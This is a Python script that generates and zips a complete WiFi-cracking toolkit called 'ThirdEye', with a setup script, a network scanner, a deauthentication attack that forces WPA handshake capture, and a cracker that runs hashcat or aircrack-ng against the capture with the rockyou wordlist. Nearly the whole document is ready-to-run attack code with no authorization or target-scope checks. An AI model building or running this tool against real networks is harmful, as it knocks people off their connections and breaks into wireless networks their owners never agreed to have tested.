import os
import zipfile

# Project Name
zip_name = "ThirdEye_V1.1_Final_Project.zip"

# 1. Sabhi updated scripts ka database
files = {
    "setup.sh": """
#!/bin/bash
echo -e "\\e[1;34m🧿 ThirdEye: Initializing Unified Setup...\\e[0m"
if [ -d "/data/data/com.termux" ]; then
    ENV="Termux"; INSTALL_CMD="pkg install -y"
else
    ENV="Linux"; INSTALL_CMD="sudo apt update && sudo apt install -y"
fi
$INSTALL_CMD aircrack-ng reaver pixiewps hashcat hcxtools python nmap curl
if [ "$ENV" == "Linux" ]; then sudo apt install -y python3-tk; fi
pip install pandas tabulate colorama
if [ "$ENV" == "Termux" ] && [ ! -f "rockyou.txt" ]; then
    curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
fi
chmod +x main.py gui_main.py
echo -e "\\e[1;32m[+] Setup Complete! Environment: $ENV\\e[0m"
""",
    "main.py": """
import os
from colorama import Fore, Style, init
from utils import check_root, toggle_monitor, create_folders
from scanner import wifi_scan
from attacks import ThirdEyeAttacks
from cracker import ThirdEyeCracker

init(autoreset=True)
def main():
    if not os.path.exists("/data/data/com.termux"): check_root()
    create_folders()
    print(f"{Fore.CYAN}{Style.BRIGHT}🧿 THIRD-EYE WIFI-CRACKER v1.1")
    iface = input("Enter Interface (e.g. wlan0): ")
    toggle_monitor(iface, "start")
    mon_iface = iface + "mon" if "mon" not in iface else iface
    atk = ThirdEyeAttacks(mon_iface); crk = ThirdEyeCracker()
    while True:
        print(f"\\n{Fore.GREEN}1. Scan | 2. Handshake | 3. Crack | 4. Exit")
        choice = input(f"{Fore.YELLOW}ThirdEye > ")
        if choice == '1': wifi_scan(mon_iface)
        elif choice == '2': atk.handshake_capture(input("BSSID: "), input("CH: "), input("ESSID: "))
        elif choice == '3': crk.auto_crack_selector(input("CAP File Path: "))
        elif choice == '4': toggle_monitor(mon_iface, "stop"); break
if __name__ == "__main__": main()
""",
    "gui_main.py": """
import tkinter as tk
from tkinter import ttk
import threading
from scanner import wifi_scan
from utils import toggle_monitor

class ThirdEyeGUI:
    def __init__(self, root):
        self.root = root
        self.root.title("🧿 ThirdEye v1.1 GUI")
        self.root.geometry("800x600")
        self.root.configure(bg="#121212")
        tk.Label(root, text="THIRD-EYE PENTESTING GUI", font=("Courier", 20), fg="#00ffcc", bg="#121212").pack(pady=10)
        self.tree = ttk.Treeview(root, columns=("BSSID", "CH", "PWR", "ESSID"), show='headings')
        for col in ("BSSID", "CH", "PWR", "ESSID"): self.tree.heading(col, text=col)
        self.tree.pack(pady=10, fill=tk.X, padx=20)
        tk.Button(root, text="Start 15s Scan", command=self.start_scan, bg="#28a745", fg="white").pack(pady=5)
        self.console = tk.Text(root, height=10, bg="black", fg="#00ff00")
        self.console.pack(fill=tk.X, padx=20, pady=10)
    def start_scan(self):
        self.console.insert(tk.END, "[*] Scanning started...\\n")
        threading.Thread(target=self.do_scan).start()
    def do_scan(self):
        df = wifi_scan("wlan0mon")
        for i in self.tree.get_children(): self.tree.delete(i)
        if df is not None:
            for _, r in df.iterrows(): self.tree.insert("", "end", values=(r['BSSID'], r['channel'], r['pwr'], r['essid']))
            self.console.insert(tk.END, "[+] Scan complete.\\n")
if __name__ == "__main__":
    root = tk.Tk(); app = ThirdEyeGUI(root); root.mainloop()
""",
    "utils.py": """
import os, subprocess
from colorama import Fore

def check_root():
    if os.getuid() != 0: print(f"{Fore.RED}[!] Error: Run with sudo!"); exit()

def toggle_monitor(iface, mode="start"):
    subprocess.run(["sudo", "airmon-ng", "check", "kill"], capture_output=True)
    subprocess.run(["sudo", "airmon-ng", mode, iface], capture_output=True)

def create_folders():
    if not os.path.exists("captures"): os.makedirs("captures")
""",
    "scanner.py": """
import pandas as pd
import subprocess, os, time
from tabulate import tabulate
from colorama import Fore

def wifi_scan(iface):
    os.system("rm -f scan-01.csv")
    p = subprocess.Popen(["sudo", "airodump-ng", "-w", "scan", "--output-format", "csv", iface], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try: time.sleep(15)
    except KeyboardInterrupt: pass
    p.terminate()
    if os.path.exists("scan-01.csv"):
        df = pd.read_csv("scan-01.csv", skipinitialspace=True).dropna(subset=['BSSID'])
        print(tabulate(df[['BSSID', 'channel', 'pwr', 'essid']], headers='keys', tablefmt='psql'))
        return df
    return None
""",
    "attacks.py": """
import subprocess, time, os, signal
from colorama import Fore

class ThirdEyeAttacks:
    def __init__(self, iface): self.iface = iface
    def handshake_capture(self, b, c, e):
        out = f"captures/{e.replace(' ', '_')}"
        p = subprocess.Popen(["sudo", "airodump-ng", "-c", c, "--bssid", b, "-w", out, self.iface])
        print(f"{Fore.RED}[!] Sending Deauth...")
        subprocess.run(["sudo", "aireplay-ng", "--deauth", "15", "-a", b, self.iface])
        time.sleep(10); os.kill(p.pid, signal.SIGTERM)
        print(f"{Fore.GREEN}[+] Captured: {out}")
""",
    "cracker.py": """
import subprocess, os
from colorama import Fore

class ThirdEyeCracker:
    def __init__(self):
        paths = ["/usr/share/wordlists/rockyou.txt", "rockyou.txt"]
        self.default_wordlist = next((p for p in paths if os.path.exists(p)), "rockyou.txt")

    def auto_crack_selector(self, cap):
        print("1. Hashcat (GPU) | 2. Aircrack (CPU)")
        c = input("Choice: ")
        if c == '1':
            h = cap.replace(".cap", ".hc22000")
            subprocess.run(["hcxpcapngtool", "-o", h, cap])
            subprocess.run(["hashcat", "-m", "22000", h, self.default_wordlist, "--force"])
        else:
            subprocess.run(["sudo", "aircrack-ng", "-w", self.default_wordlist, cap])
""",
    "README.md": "# ThirdEye Wifi-Cracker v1.1\n\nUnified Security Suite for Linux & Termux.\n\n## Usage\n1. `bash setup.sh` \n2. `sudo python3 gui_main.py` (Linux) or `python3 main.py` (Termux)"
}

# 2. Files generate karna aur ZIP mein pack karna
with zipfile.ZipFile(zip_name, 'w') as zipf:
    for filename, content in files.items():
        with open(filename, "w") as f:
            f.write(content.strip())
        zipf.write(filename)
        print(f"[+] Created and Packed: {filename}")

print(f"\\n{'='*40}\\n[SUCCESS] {zip_name} is ready!\\n{'='*40}")
